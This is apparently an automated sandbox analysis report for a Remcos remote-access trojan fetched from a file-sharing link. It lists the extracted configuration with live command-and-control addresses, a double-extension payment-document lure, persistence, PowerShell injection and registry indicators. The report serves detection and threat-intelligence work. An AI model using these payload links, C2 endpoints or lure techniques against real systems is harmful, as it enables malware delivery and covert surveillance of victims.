remcos | hxxps://www[.]4sync[.]com/web/directDownload/GLMgEB15/Qp7wijin[.]0a6e85fab81a6599f1cd05e88dd4aaea

Analysis

max time kernel
899s
max time network
896s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-12-2024 23:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.4sync.com/web/directDownload/GLMgEB15/Qp7wijin.0a6e85fab81a6599f1cd05e88dd4aaea

Score

10^/10

remcos rmc_one discovery execution phishing rat

Malware Config

Extracted

Family

remcos

Botnet

rmc_one

101.99.94.64:2404

101.99.94.64:80

101.99.94.64:8080

101.99.94.64:465

101.99.94.64:50000

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
rmc
mouse_option
false
mutex
HjoNmh22H-06BKOP
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
206	2500	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2500	powershell.exe

Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
phishing

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Електронний платіжний документ.pdf.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	Електронний платіжний документ.pdf.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\deleteapp.url	taskmgr.exe

Executes dropped EXE 1 IoCs

pid	Process
5728	Електронний платіжний документ.pdf.exe

Loads dropped DLL 3 IoCs

pid	Process
5728	Електронний платіжний документ.pdf.exe
5728	Електронний платіжний документ.pdf.exe
5728	Електронний платіжний документ.pdf.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2500 set thread context of 388	2500	powershell.exe	153

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Електронний платіжний документ.pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 3cde0e7ad218db01	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 16 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003c000000900300001c020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{FAB1930D-C184-11EF-A4B7-E24E87F0D14E} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
3476	msedge.exe
3476	msedge.exe
5052	msedge.exe
5052	msedge.exe
4500	identity_helper.exe
4500	identity_helper.exe
4652	msedge.exe
4652	msedge.exe
5840	msedge.exe
5840	msedge.exe
5840	msedge.exe
5840	msedge.exe
2500	powershell.exe
2500	powershell.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4752	OpenWith.exe
6012	OpenWith.exe
388	RegAsm.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	5736	7zG.exe
Token: 35	5736	7zG.exe
Token: SeSecurityPrivilege	5736	7zG.exe
Token: SeSecurityPrivilege	5736	7zG.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	768	taskmgr.exe
Token: SeSystemProfilePrivilege	768	taskmgr.exe
Token: SeCreateGlobalPrivilege	768	taskmgr.exe
Token: 33	768	taskmgr.exe
Token: SeIncBasePriorityPrivilege	768	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5736	7zG.exe
736	NOTEPAD.EXE
5052	msedge.exe
5052	msedge.exe
5424	iexplore.exe
5424	iexplore.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
5052	msedge.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe
768	taskmgr.exe

Suspicious use of SetWindowsHookEx 30 IoCs

pid	Process
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
4752	OpenWith.exe
6012	OpenWith.exe
6012	OpenWith.exe
6012	OpenWith.exe
6012	OpenWith.exe
6012	OpenWith.exe
6012	OpenWith.exe
6012	OpenWith.exe
6012	OpenWith.exe
6012	OpenWith.exe
5424	iexplore.exe
5424	iexplore.exe
5600	IEXPLORE.EXE
5600	IEXPLORE.EXE
5728	Електронний платіжний документ.pdf.exe
5728	Електронний платіжний документ.pdf.exe
5728	Електронний платіжний документ.pdf.exe
388	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5052 wrote to memory of 4368	5052	msedge.exe	83
PID 5052 wrote to memory of 4368	5052	msedge.exe	83
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 2800	5052	msedge.exe	84
PID 5052 wrote to memory of 3476	5052	msedge.exe	85
PID 5052 wrote to memory of 3476	5052	msedge.exe	85
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86
PID 5052 wrote to memory of 1884	5052	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.4sync.com/web/directDownload/GLMgEB15/Qp7wijin.0a6e85fab81a6599f1cd05e88dd4aaea
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9970546f8,0x7ff997054708,0x7ff997054718
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
  2⤵
  PID:2800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
  2⤵
  PID:1884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:1204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:992
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:1636
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:1704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:2232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5308 /prefetch:8
  2⤵
  PID:3684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:3308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5992 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5028 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1212 /prefetch:1
  2⤵
  PID:4680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
  2⤵
  PID:4332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
